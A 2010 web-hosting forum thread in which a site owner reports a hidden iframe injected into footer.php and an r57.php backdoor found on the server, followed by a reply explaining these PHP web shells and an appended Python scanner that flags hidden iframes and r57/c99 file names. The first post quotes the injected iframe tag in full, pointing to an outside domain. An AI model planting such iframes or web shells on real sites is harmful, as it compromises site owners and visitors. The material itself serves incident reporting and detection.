iframe CODE inserted into my footer.php



Tony
04-28-2010, 07:52 PM
Hello, I went to my site today and noticed that my antivirus keeps blocking a URL on my website. After checking, I discovered an iframe in my footer; it was placed on the main index.php. I also discovered a new script on my server that I did not place there, "r57.php", which my antivirus said is a trojan. I do not have any clue how they got to my site.

<iframe src="http://h7jejlj0.skottles.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

williamd
04-30-2010, 07:25 PM
Hey Tony,

That's sad to hear. The r57 shell script is a Russian PHP backdoor script that allows a hacker to do just about as much as you can do with your server - if not more. My guess is that someone found out your password to your account. Is there any way you can check your log files? In any case, change your passwords as soon as possible.

If you want to see how the r57 works, check out http://www.youtube.com/watch?v=ZFQ1PAdI6AY

You may also want to search for c99, which is another PHP-based shell.
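
A small sweep for the two indicators discussed in this thread (a zero-sized iframe with an external src, and files left under the r57 or c99 names), added here as an example and not part of either post. The sample files, the domain injected.example.invalid and the function names are constructed for illustration.

```python
import os
import re
import tempfile

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# width/height set to 0, as in the tag quoted in the first post
ZERO_DIM_RE = re.compile(r"\b(?:width|height)\s*=\s*[\"']?0(?:px)?[\"']?(?=[\s>/])", re.I)
SRC_RE = re.compile(r"\bsrc\s*=\s*[\"']?(https?://[^\"'\s>]+)", re.I)
# default file names of the two shells named in the thread
SHELL_NAME_RE = re.compile(r"(?:^|[^a-z0-9])(?:r57|c99)", re.I)


def scan_webroot(root):
    """Return sorted (relative_path, reason) findings for files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if SHELL_NAME_RE.search(name):
                findings.append((rel, "shell-like file name"))
            if not name.lower().endswith((".php", ".html", ".htm", ".tpl", ".inc")):
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            for tag in IFRAME_RE.findall(text):
                src = SRC_RE.search(tag)
                if src and ZERO_DIM_RE.search(tag):
                    findings.append((rel, "hidden iframe -> " + src.group(1)))
    return sorted(findings)


def demo():
    """Scan a throwaway directory of constructed sample files."""
    samples = {
        "footer.php": '<iframe src="http://injected.example.invalid/lib/index.php" width=0 height=0></iframe>\n',
        "index.php": '<iframe src="https://video.example.invalid/embed/1" width="560" height="315"></iframe>\n',
        "r57.php": "<?php /* constructed placeholder, not a real shell */ ?>\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_webroot(root)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

Name matching only catches shells left under their default names; a renamed copy needs content or file-integrity checks.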